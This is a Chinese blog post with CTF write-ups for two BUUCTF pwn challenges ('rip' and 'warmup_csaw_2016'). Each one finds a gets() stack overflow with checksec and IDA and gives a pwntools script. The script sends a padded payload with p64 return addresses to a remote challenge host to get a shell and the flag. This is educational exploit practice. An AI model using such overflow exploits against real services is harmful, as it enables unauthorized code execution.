首页 > 其他分享 >BUUCTF PWN

BUUCTF PWN

时间:2022-09-26 20:56:54浏览次数:56  
标签:BUUCTF p64 查看 地址 0x401186 flag PWN payload

rip

image
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅
image
首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址0X401186
image
查看main函数的反编译代码发现gets(s, argv)栈溢出漏洞,没有限制s的输入大小
点开s查看s的内存大小发现距离返回地址为0XF+0X8
image
构造payload:'a' * 0x23 + p64(0x401186)
发现连接超时image
这道题的s应该是一个局部变量,23个刚刚覆盖了rbp,然后那两个地址紧接着往下排,0x401198是 “retn” 保证程序能正常返回,然后0x401186在Main函数栈顶。又因为retn相当于pop + 执行,故形成了返回地址劫持~~
解决办法:payload=‘a’ * 23+ p64(0x401198) + p64(0x401186) #0x401198为返回地址
exp:

from pwn import * 

p = remote("node4.buuoj.cn",28191) 

payload = 'a' * 23 + p64(0x401198) + p64(0x401186) 

p.sendline(payload) 

p.interactive()

image
得到shell权限最后查看flag得到flag
image

warmup_csaw_2016

同样使用checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅
image
shift+f12查看字串发现查看flag的函数
image
跟进找到cat flag的函数返回地址0x40060D
image
打开main函数发现又是简单的栈溢出问题,找到溢出漏洞gets,没有对v5的输入做出限制
image
点击查看v5的内存,发现填充40字节的数据加上因为是64位文件加上8字节返回地址
image
构建payload:'a' * 0x48 + p64(0x40060D),构建exp

from pwn import * 

p = remote("node4.buuoj.cn",27321) 

payload = 'a' * 0x48 + p64(0x40060D) 

p.sendline(payload) 

p.interactive()

得到flag
image

标签:BUUCTF,p64,查看,地址,0x401186,flag,PWN,payload
From: https://www.cnblogs.com/xuanbb9826/p/16732342.html

相关文章

  • NewStartCTF week1 pwn
    ret2text很简单的一道栈溢出题目首先通过checksec查看题目开启了什么保护,只开启了NX,是64位的amd文件拖到ida中查看首先shift+f12查看字串发现,/bin/sh双击跟进发现调......
  • BUUCTF [BJDCTF2020]Easy MD5 详解
    1.题目搞了好久,这道题,就一个简简单单的输入框。2、利用md5($password,true)实现SQL注入打开题目,看上去像sql注入,也有可能是命令执行,或者SSRF,但是注入半天也没什么反应......
  • 攻防世界 new_easypwn 题解
    攻防世界new_easypwn题解程序分析查看程序基本情况,如图,该程序是64位程序,开启了Canary、NX、PIE保护。使用ida64打开分析程序,该程序是个电话录之类的,可以添加、删除、......
  • 攻防世界 pwn1 题解
    攻防世界pwn1题解下载附件,file命令识别文件为64位,checksec命令查看程序保护情况,如图,有Canary和NX保护。在ida64中打开程序,程序的主要功能有两个:存储用户输入的字符......
  • buuctf 间谍启示录
    下载下来是一个镜像文件先不运行,放在010里看看有没有什么内容直接搜索发现有flag.exe尝试用binwalk分离,发现分离不出来,那就用foremost分离分离出来拿到windows里是这......
  • buuctf
    注意,strcat拼接时,是以小端序方式拼接的,0x……LL中的LL指的是longlong类型,从右到左读字符。frombinasciiimporta2b_heximportgmpy2t1='4E44434C53'key='ADSFK'+......
  • buuctf-web-[SUCTF 2019] CheckIn
    概述时间:August92022测试发现不可以上传以.ph开头的后缀名文件。于是想到上传.htaccess文件+上传图片马的方式执行webshell,结果并没有成功。为啥失败了呢?原来题目环境......